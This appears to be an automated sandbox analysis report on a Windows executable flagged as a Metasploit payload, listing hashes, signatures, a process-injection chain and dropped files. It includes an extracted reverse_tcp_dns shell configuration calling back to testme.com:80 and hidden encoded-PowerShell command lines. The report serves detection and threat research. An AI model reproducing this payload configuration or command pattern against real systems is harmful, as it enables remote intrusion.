Analysis
- max time kernel: 149s
- max time network: 149s
- platform: windows7_x64
- resource: win7-20240508-en
- resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
- submitted: 22-06-2024 21:48
Static task: static1
Behavioral task: behavioral1
- Sample: 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
- Resource: win7-20240508-en
Behavioral task: behavioral2
- Sample: 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
- Resource: win10v2004-20240611-en
General
- Target: 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
- Size: 457KB
- MD5: 03f9fd2ed89de09d2dbed8de06f8fe76
- SHA1: 4abfa12b785713bcb8a8d07175114dc903196fc3
- SHA256: ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624
- SHA512: f11a7029308abaa10f5b5cda1c04997f24d3e275b101533a15aa74645b05ed102f448002bfdeb2df86ca6651ab707eaa20fa1e1835851dc18754b2fdeb9ff1d3
- SSDEEP: 6144:x9JLFprEWDl7s5t38dX6pKE4dU7kpoTcnFOHuln+Otc+EkzI8jSejCE8aKP3sGvt:x99gbP/GFK9ACwdag/2OuV8IRCg
Malware Config
- Extracted: metasploit, encoder/shikata_ga_nai
- Extracted: metasploit, windows/reverse_tcp_dns, testme.com:80
Signatures
- MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
- Blocklisted process makes network request (8 IoCs)
  Processes (flow, pid, process):
  3  2700  powershell.exe
  3  2700  powershell.exe
  3  2700  powershell.exe
  3  2700  powershell.exe
  3  2700  powershell.exe
  3  2700  powershell.exe
  3  2700  powershell.exe
  3  2700  powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Run Powershell and hide display window.
  Processes (pid, process):
  2100  powershell.exe
  1892  powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes (pid, process):
  2100  powershell.exe
  1892  powershell.exe
  2700  powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description, pid, process):
  Token: SeDebugPrivilege  2100  powershell.exe
  Token: SeDebugPrivilege  1892  powershell.exe
  Token: SeDebugPrivilege  2700  powershell.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (description, pid, process, target process):
  PID 1708 wrote to memory of 2100  1708  03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe  powershell.exe
  PID 1708 wrote to memory of 2100  1708  03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe  powershell.exe
  PID 1708 wrote to memory of 2100  1708  03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe  powershell.exe
  PID 1708 wrote to memory of 2100  1708  03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe  powershell.exe
  PID 2100 wrote to memory of 1892  2100  powershell.exe  powershell.exe
  PID 2100 wrote to memory of 1892  2100  powershell.exe  powershell.exe
  PID 2100 wrote to memory of 1892  2100  powershell.exe  powershell.exe
  PID 2100 wrote to memory of 1892  2100  powershell.exe  powershell.exe
  PID 1892 wrote to memory of 2700  1892  powershell.exe  powershell.exe
  PID 1892 wrote to memory of 2700  1892  powershell.exe  powershell.exe
  PID 1892 wrote to memory of 2700  1892  powershell.exe  powershell.exe
  PID 1892 wrote to memory of 2700  1892  powershell.exe  powershell.exe
  PID 2700 wrote to memory of 2732  2700  powershell.exe  csc.exe
  PID 2700 wrote to memory of 2732  2700  powershell.exe  csc.exe
  PID 2700 wrote to memory of 2732  2700  powershell.exe  csc.exe
  PID 2700 wrote to memory of 2732  2700  powershell.exe  csc.exe
  PID 2732 wrote to memory of 2660  2732  csc.exe  cvtres.exe
  PID 2732 wrote to memory of 2660  2732  csc.exe  cvtres.exe
  PID 2732 wrote to memory of 2660  2732  csc.exe  cvtres.exe
  PID 2732 wrote to memory of 2660  2732  csc.exe  cvtres.exe
Processes
- (level 1) C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"
  - Suspicious use of WriteProcessMemory
  PID: 1708
- (level 2) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand …
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2100
- (level 3) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand …
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1892
- (level 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc …
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2700
- (level 5) C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnlr-kac.cmdline"
  - Suspicious use of WriteProcessMemory
  PID: 2732
- (level 6) C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
  Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38DD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC38DC.tmp"
  PID: 2660
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: bc429cab527bdae7fea6482775b95391
  SHA1: 3baab5115b94f7d9c065440200464e6af2a84f91
  SHA256: 5d0162a806205e8661c9fd72a99c3b48af55c0db129c2533cb968daeb9a7948a
  SHA512: 73bff415e35c1bb42b02897a5ee983922fb66f103e53c381cf3874bf088a35b5a29ad772a297fda4b25453f2025888b89f5fb21645c2d3bc26a05417b00c54fb
- Filesize: 3KB
  MD5: 8ae45b56a4d40070bff2a57010ca829f
  SHA1: 07924b4f6fb54b3105d3dfb429bf482cd6609e5a
  SHA256: 47d84ae418a90f4120511e78492b0477f1085fc18b7419c63edccaec5ce9625a
  SHA512: 159033634a196cda3df156cc11b52b633610b2a5b2cb753a18728485972afaa6a05ff2c9383112e001ae8cdb9d8ff0fa3282bb44308134f8baaf812dc21a3170
- Filesize: 7KB
  MD5: 80deabb48aef123c006aebcafef01f8d
  SHA1: ec14a45d86c617b7cb8974c467205265c35d462f
  SHA256: e0cf193162ff37f68e42fdc67ef7eac0ab7f1741ee42d308dafd4f1bda33ecad
  SHA512: 6702e163435ee4561c9c32a4c52be897ab3f0db59659f24bc9fb06d222757c3f14f0e3f3f61be77078a0bdc7270aed7450459794a68d13b89e1dfb8826230dff
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: b6871bb612b0350b771280f6c95b4902
  SHA1: 68281830cae5ee715ba3d85f46c67db1621f5dcb
  SHA256: f5e80d286d077ea62a999e9395b5eb49a3b4fe519100b5db8e2a647b75dabc70
  SHA512: 096393da0d01cb09e77f196fef9769f1bc7f4618e4c2dfccc7e634e57939df08abb01e04340a99faac7e0b14dd9fa949d54c3a63079c6120aefe59be9fd8e010
- Filesize: 652B
  MD5: f80729650f8f0526c3c5e6c891efee75
  SHA1: 656d8a58d3bf4ad9298f3bc74097a890dc0bf43e
  SHA256: 49f6513126f0a42d8152ccf1e58b62c35bcd5c11e6cb58fc07fd8075d4ec1467
  SHA512: 75df3c9dcf5895b49092d61de08ecb938961407dc347df86ba05f4b5d43c0223f0c16ad050871d2e6891a1a67b1f551b2e93c0fe8bc47e556af1ef2b7ec2cfac
- Filesize: 557B
  MD5: 7319070c34daa5f6f2ece2dfc07119ee
  SHA1: f26a4a48518a5608e93c8b77368f588b0433973c
  SHA256: b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
  SHA512: 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd
- Filesize: 309B
  MD5: ac79210adb489947c774aa90662ba787
  SHA1: 90c90291919bcceb605acc62c9319d720580cac4
  SHA256: 83ebaec4c4d3cdc7e55736c5958dbec7aeb4da365a4d96a29564d83f55290afb
  SHA512: e304e7afaccdd35510a1636403a64832e164072aa2938650e97c9c70189d13ae7245f8f12e736d5fe59e63bf58d69bb8aeb2f2c00a24d173011029e83c2355bb